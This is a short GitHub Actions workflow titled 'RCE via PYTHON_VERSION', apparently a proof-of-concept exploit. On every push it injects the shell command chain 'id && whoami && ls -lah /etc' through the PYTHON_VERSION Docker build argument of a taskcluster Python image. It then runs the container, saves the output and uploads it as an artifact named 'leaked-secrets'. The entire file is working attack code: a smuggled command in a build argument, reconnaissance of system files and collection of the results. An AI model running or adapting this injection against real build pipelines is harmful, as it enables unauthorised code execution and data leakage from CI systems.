name: RCE via PYTHON_VERSION

on:
  push:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Build Docker image with injected command
        run: |
          docker build \
            --build-arg PYTHON_VERSION="id && whoami && ls -lah /etc" \
            -t leak-image ./taskcluster/docker/python

      - name: Run container and capture leak output
        run: |
          docker run --rm leak-image > leaks.txt
          cat leaks.txt

      - name: Upload leaked data as artifact
        uses: actions/upload-artifact@v4
        with:
          name: leaked-secrets
          path: leaks.txt
